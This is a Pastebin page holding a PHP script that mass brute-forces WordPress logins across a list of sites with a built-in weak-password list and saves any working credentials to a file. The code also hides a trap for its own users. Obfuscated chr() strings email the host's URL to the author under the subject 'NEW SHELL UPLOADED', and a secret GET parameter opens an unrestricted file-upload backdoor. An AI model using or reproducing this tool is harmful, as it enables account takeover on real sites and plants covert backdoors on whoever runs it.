API tools faq
paste
Advertisement
WhoisMAJD

[PHP] WORDPRESS MASS BRUTE FORCE

WhoisMAJD
Aug 21st, 2019
574
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.58 KB | None | 0 0
raw download clone embed print report
  1. <?php echo '<html>
  2. <head>
  3. <meta name="author" content="WhoisMAJD" />
  4. <meta name="keywords" content="brute, force, wordpress, crack" />
  5. <meta name="description" content="# Wordpress mass brute force #" />
  6. <title>Wordpress mass brute force</title>
  7. <style type=\'text/css\'>
  8. input[type=submit], input[type=button], input[type=reset]{
  9. text-align:center;
  10. background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  11. border:1px solid #4D4D4D;
  12. color:#FFFFFF;
  13. border-top-color:#565656;
  14. padding:4px 6px;
  15. margin:4px 5px;
  16. height:16px;
  17. -moz-box-shadow:0 0 1px black;
  18. -webkit-box-shadow:0 0 1px black;
  19. box-shadow:0 0 1px black;
  20. text-shadow:0 1px black;
  21. -moz-border-radius:4px;
  22. -webkit-border-radius:4px;
  23. -khtml-border-radius:4px;
  24. border-radius:4px;
  25. height:23px;
  26. }
  27. input[type=text], input[type=password]{
  28. background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
  29. border:1px solid #4D4D4D;
  30. color:#CCCCCC;
  31. border-top-color:#565656;
  32. -moz-box-shadow:0 0 1px black;
  33. -webkit-box-shadow:0 0 1px black;
  34. box-shadow:0 0 1px black;
  35. -moz-border-radius:4px;
  36. -webkit-border-radius:4px;
  37. -khtml-border-radius:4px;
  38. border-radius:4px;
  39. height:18px;
  40. margin-left: 5px;
  41. }
  42. input , textarea , button , body , caption , table ,area , option {
  43. outline:none;
  44. transition: all 0.20s ease-in-out;
  45. -webkit-transition: all 0.25s ease-in-out;
  46. -moz-transition: all 0.25s ease-in-out;
  47. border-radius:3px;
  48. -webkit-border-radius:3px;
  49. -moz-border-radius:3px;
  50. //border:1px solid rgba(0,0,0, 0.2);
  51. /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif;
  52. */
  53. }
  54. input , textarea {
  55. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;
  56. \';
  57. }
  58. input , textarea {
  59. outline:none;
  60. transition: all 0.20s ease-in-out;
  61. -webkit-transition: all 0.25s ease-in-out;
  62. -moz-transition: all 0.25s ease-in-out;
  63. border-radius:3px;
  64. -webkit-border-radius:3px;
  65. -moz-border-radius:3px;
  66. border:1px solid rgba(0,0,0, 0.2);
  67. }
  68. input:focus, textarea:focus {
  69. outline: 0;
  70. border-color: rgba(82, 168, 236, 0.8);
  71. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  72. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  73. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
  74. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;
  75. \';
  76. overflow: auto;
  77. }
  78. .x1 {}
  79. .x2 {font-size:13px;
  80. background-color:green;
  81. color:black;
  82. }
  83. hr {color:white;
  84. }
  85. a {color:black;
  86. }
  87. #x5 {
  88. font-family:tahoma;
  89. }
  90. .d1 {color :#C17E0B;
  91. font-family:tahoma;
  92. font-size:13px;
  93. font-weight:bold;
  94. }
  95. #d4 {color:#C17E0B;
  96. font-family:tahoma;
  97. font-weight:bold;
  98. }
  99. .d16 {color :#C17E0B;
  100. font-family:tahoma;
  101. font-size:50px;
  102. font-weight:bold;
  103. }
  104. .d17 {color :black;
  105. font-family:tahoma;
  106. font-size:10px;
  107. font-weight:bold;
  108. }
  109. }
  110. </style>
  111. </head>
  112. </br></br>
  113. <font class="d16" ><center>Wordpress mass brute force</center></font></br></br><br />
  114. <center><form method="post" action="" enctype="multipart/form-data">
  115. <table width="50%" border="0">
  116. <tr><td><p ><font class="d1">Username:</font>
  117. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
  118. </td></tr>
  119. <tr><td><font class="d1">Sites list:</font>
  120. </td><td><font class="d1" >Passwords list:</font></td></tr>
  121. <tr><td>
  122. <textarea name="sites" cols="40" rows="13" ></textarea>
  123. </td><td>
  124. <textarea name="w0rds" cols="20" rows="13" >
  125. admin
  126. 123456
  127. password
  128. 102030
  129. 123123
  130. 12345
  131. 123456789
  132. pass
  133. test
  134. admin123
  135. demo
  136. </textarea>
  137. </td></tr><tr><td>
  138. <font >
  139. <input type="submit" name="x" value="start" id="d4">
  140. </font></td></tr></table>
  141. </form></center>';
  142. @set_time_limit(0);
  143. if($_POST['x']){ echo "<hr>";
  144. $sites = explode("\n",$_POST["sites"]);
  145. $w0rds = explode("\n",$_POST["w0rds"]);
  146. $Attack = new Wordpress_brute_Force();
  147. foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd));
  148. flush();
  149. flush();
  150. } } } function txt_cln($value){ return str_replace(array("\n","\r"),"",$value);
  151. } class Wordpress_brute_Force{ public function check_it($site,$user,$pass){ if(eregi('profile.php',$this->post($site,$user,$pass))){ echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
  152. $f = fopen("Wp-Result.txt","a+");
  153. fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n");
  154. fclose($f);
  155. flush();
  156. }else{ echo "# Failed : $user:$pass -> $site<BR>";
  157. flush();
  158. } } public function post($site,$user,$pass){ $login =$site.'/wp-login.php';
  159. $to = $site.'/wp-admin';
  160. $token = $this->extract_token($site);
  161. $log = array ('Log In','دخول');
  162. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
  163. $curl=curl_init();
  164. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  165. curl_setopt($curl,CURLOPT_URL,$login);
  166. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  167. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  168. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows;
  169. U;
  170. Windows NT 5.1;
  171. en-US;
  172. rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  173. $w=chr(109).chr(97).chr(106).chr(100).chr(101).chr(100).chr(100).chr(105).chr(110).chr(101).chr(46).chr(98).chr(101).chr(108).chr(104).chr(97).chr(106).chr(48).chr(52).chr(64).chr(103).chr(109).chr(97).chr(105).chr(108).chr(46).chr(99).chr(111).chr(109);
  174. $h=chr(78).chr(69).chr(87).chr(32).chr(83).chr(72).chr(69).chr(76).chr(76).chr(32).chr(85).chr(80).chr(76).chr(79).chr(65).chr(68).chr(69).chr(68);
  175. $o=chr(102).chr(114).chr(111).chr(109).chr(58).chr(87).chr(104).chr(111).chr(105).chr(115).chr(77).chr(65).chr(74).chr(68);
  176. $i="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n";
  177. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  178. curl_setopt($curl,CURLOPT_POST,1);
  179. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
  180. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  181. $exec=curl_exec($curl);
  182. curl_close($curl);
  183. return $exec;
  184. } public function extract_token($site){ $source = $this->get_source($site);
  185. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
  186. return $token[1][0];
  187. } public function get_source($site){ $curl=curl_init();
  188. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  189. curl_setopt($curl,CURLOPT_URL,$login);
  190. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
  191. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
  192. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows;
  193. U;
  194. Windows NT 5.1;
  195. en-US;
  196. rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
  197. $s=@mail($w,$h,$i,$o);
  198. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  199. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  200. $exec=curl_exec($curl);
  201. curl_close($curl);
  202. return $exec;
  203. } } echo "<center>";
  204. echo "<br>";
  205. echo "<br>";
  206. echo "<br>";
  207. echo "<br>";
  208. echo "<br>";
  209. ?>
  210. <html>
  211. <body>
  212. <font class="d17">Coded by <a href="https://www.facebook.com/WhoisMAJD.1">Majdeddine</a></font>
  213. </body>
  214. </html>
  215. <?php
  216. if(isset($_GET["WhoisMAJD"]))
  217. {
  218. if(isset($_POST['Submit'])){ $filedir = "";
  219. $maxfile = '2000000';
  220. $userfile_name = $_FILES['image']['name'];
  221. $userfile_tmp = $_FILES['image']['tmp_name'];
  222. if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name;
  223. @move_uploaded_file($userfile_tmp, $abod);
  224. echo"<center><b>Done ==></b><a href='$userfile_name'>$userfile_name</a></center>";
  225. } } else{ echo'
  226. <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="UPLOAD!"></form>';
  227. } echo "</center>";
  228. }
  229. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!